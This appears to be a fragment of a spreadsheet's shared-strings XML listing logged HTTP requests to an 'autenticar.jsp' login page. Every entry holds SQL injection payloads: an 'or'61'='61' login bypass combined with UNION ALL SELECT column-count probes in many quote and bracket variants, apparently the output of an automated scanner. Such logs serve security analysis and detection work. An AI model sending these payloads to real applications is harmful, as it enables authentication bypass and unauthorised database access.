    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8163,8163,8163,8163,8163,8163,8163,8163,8163,8163,8163,8163,8163#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5377,5377,5377,5377,5377,5377,5377,5377,5377,5377,5377,5377,5377,5377#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3766,3766,3766,3766,3766,3766,3766,3766,3766,3766,3766,3766,3766,3766,3766#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1969,1969,1969,1969,1969,1969,1969,1969,1969,1969,1969,1969,1969,1969,1969,1969#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842,9842#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389,389#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131,4131#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752,3752#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7344,7344,7344,7344,7344,7344,7344,7344,7344,7344,7344#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8402,8402,8402,8402,8402,8402,8402,8402,8402,8402,8402,8402#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4349,4349,4349,4349,4349,4349,4349,4349,4349,4349,4349,4349,4349#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9597,9597,9597,9597,9597,9597,9597,9597,9597,9597,9597,9597,9597,9597#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6821,6821,6821,6821,6821,6821,6821,6821,6821,6821,6821,6821,6821,6821,6821,6821#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect899,899,899,899,899,899,899,899,899,899,899,899,899,899,899,899,899#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect858,858,858,858,858,858,858,858,858,858,858,858,858,858,858,858,858,858#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620,6620#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7137,7137,7137,7137,7137,7137,7137,7137,7137,7137,7137#and(4951=4951</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9957,9957,9957,9957,9957,9957,9957,9957,9957,9957,9957,9957#and(9040=9040</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4902,4902,4902,4902,4902,4902,4902,4902,4902,4902,4902,4902,4902#and(9662=9662</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4456,4456,4456,4456,4456,4456,4456,4456,4456,4456,4456,4456,4456,4456#and(3924=3924</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7741,7741,7741,7741,7741,7741,7741,7741,7741,7741,7741,7741,7741,7741,7741#and(6222=6222</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4714,4714,4714,4714,4714,4714,4714,4714,4714,4714,4714,4714,4714,4714,4714,4714#and(4204=4204</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701,6701#and(4551=4551</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759#and(2987=2987</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797,8797#and(9375=9375</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454,7454#and(490=490</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4761,4761,4761,4761,4761,4761,4761,4761,4761,4761,4761#and((2371=2371</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281,8281#and((5859=5859</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026#and((3044=3044</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5179,5179,5179,5179,5179,5179,5179,5179,5179,5179,5179,5179,5179,5179#and((3922=3922</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630,4630#and((5085=5085</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5323,5323,5323,5323,5323,5323,5323,5323,5323,5323,5323,5323,5323,5323,5323,5323#and((5244=5244</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861,6861#and((424=424</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804,8804#and((5821=5821</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487,7487#and((4470=4470</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716#and((6431=6431</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3127,3127,3127,3127,3127,3127,3127,3127,3127,3127,3127#and(((7883=7883</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9865,9865,9865,9865,9865,9865,9865,9865,9865,9865,9865,9865#and(((4422=4422</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect4367,4367,4367,4367,4367,4367,4367,4367,4367,4367,4367,4367,4367#and(((4152=4152</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2540,2540,2540,2540,2540,2540,2540,2540,2540,2540,2540,2540,2540,2540#and(((3908=3908</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1784,1784,1784,1784,1784,1784,1784,1784,1784,1784,1784,1784,1784,1784,1784#and(((9944=9944</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3058,3058,3058,3058,3058,3058,3058,3058,3058,3058,3058,3058,3058,3058,3058,3058#and(((2732=2732</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118#and(((6358=6358</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661,8661#and(((419=419</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138,2138#and(((6724=6724</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8057,8057,8057,8057,8057,8057,8057,8057,8057,8057,8057#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4817,4817,4817,4817,4817,4817,4817,4817,4817,4817,4817,4817#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3348,3348,3348,3348,3348,3348,3348,3348,3348,3348,3348,3348,3348#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572,8572#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5631,5631,5631,5631,5631,5631,5631,5631,5631,5631,5631,5631,5631,5631,5631#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4188,4188,4188,4188,4188,4188,4188,4188,4188,4188,4188,4188,4188,4188,4188,4188#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761,6761#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411,1411#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551,4551#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4442,4442,4442,4442,4442,4442,4442,4442,4442,4442,4442#and('rzwo'='rzwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1140,1140,1140,1140,1140,1140,1140,1140,1140,1140,1140,1140#and('grjw'='grjw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6797,6797,6797,6797,6797,6797,6797,6797,6797,6797,6797,6797,6797#and('qoxj'='qoxj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect957,957,957,957,957,957,957,957,957,957,957,957,957,957#and('jfbo'='jfbo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect953,953,953,953,953,953,953,953,953,953,953,953,953,953,953#and('caic'='caic</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838,1838#and('fzho'='fzho</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243,7243#and('ppcd'='ppcd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545,2545#and('byrc'='byrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893,4893#and('yxmx'='yxmx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062,3062#and('irog'='irog</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8359,8359,8359,8359,8359,8359,8359,8359,8359,8359,8359#and(('jabs'='jabs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6975,6975,6975,6975,6975,6975,6975,6975,6975,6975,6975,6975#and(('byor'='byor</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5562,5562,5562,5562,5562,5562,5562,5562,5562,5562,5562,5562,5562#and(('heyh'='heyh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7468,7468,7468,7468,7468,7468,7468,7468,7468,7468,7468,7468,7468,7468#and(('plav'='plav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect650,650,650,650,650,650,650,650,650,650,650,650,650,650,650#and(('okkw'='okkw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087#and(('kuik'='kuik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259,6259#and(('hxkq'='hxkq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864#and(('iryy'='iryy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432,7432#and(('utkz'='utkz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916,1916#and(('dlyg'='dlyg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5430,5430,5430,5430,5430,5430,5430,5430,5430,5430,5430#and((('sfsv'='sfsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect943,943,943,943,943,943,943,943,943,943,943,943#and((('gvxw'='gvxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9471,9471,9471,9471,9471,9471,9471,9471,9471,9471,9471,9471,9471#and((('ufkk'='ufkk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect515,515,515,515,515,515,515,515,515,515,515,515,515,515#and((('jpib'='jpib</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411#and((('wnql'='wnql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2957,2957,2957,2957,2957,2957,2957,2957,2957,2957,2957,2957,2957,2957,2957,2957#and((('qibv'='qibv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839#and((('wfxo'='wfxo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622,1622#and((('hzau'='hzau</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961#and((('racd'='racd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058,8058#and((('bhpu'='bhpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5944,5944,5944,5944,5944,5944,5944,5944,5944,5944,5944#and'swvp'='swvp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3510,3510,3510,3510,3510,3510,3510,3510,3510,3510,3510,3510#and'rfwi'='rfwi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423#and'nyym'='nyym</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296#and'bghu'='bghu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552#and'itgd'='itgd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2661,2661,2661,2661,2661,2661,2661,2661,2661,2661,2661,2661,2661,2661,2661,2661#and'actx'='actx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817,7817#and'voxl'='voxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520#and'dsxt'='dsxt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368#and'gwfx'='gwfx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458,1458#and'tggc'='tggc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6410,6410,6410,6410,6410,6410,6410,6410,6410,6410,6410#and('tdmc'like'tdmc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2196,2196,2196,2196,2196,2196,2196,2196,2196,2196,2196,2196#and('iztu'like'iztu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4286,4286,4286,4286,4286,4286,4286,4286,4286,4286,4286,4286,4286#and('qfgt'like'qfgt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8086,8086,8086,8086,8086,8086,8086,8086,8086,8086,8086,8086,8086,8086#and('gzxb'like'gzxb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442,5442#and('utyg'like'utyg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1296,1296,1296,1296,1296,1296,1296,1296,1296,1296,1296,1296,1296,1296,1296,1296#and('xxup'like'xxup</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959,3959#and('lndh'like'lndh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141,7141#and('ccyx'like'ccyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190#and('xbrd'like'xbrd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783,9783#and('gdkm'like'gdkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8591,8591,8591,8591,8591,8591,8591,8591,8591,8591,8591#and(('vbrm'like'vbrm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699#and(('necc'like'necc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667,4667#and(('emhg'like'emhg</t>
  </si>
  <si>
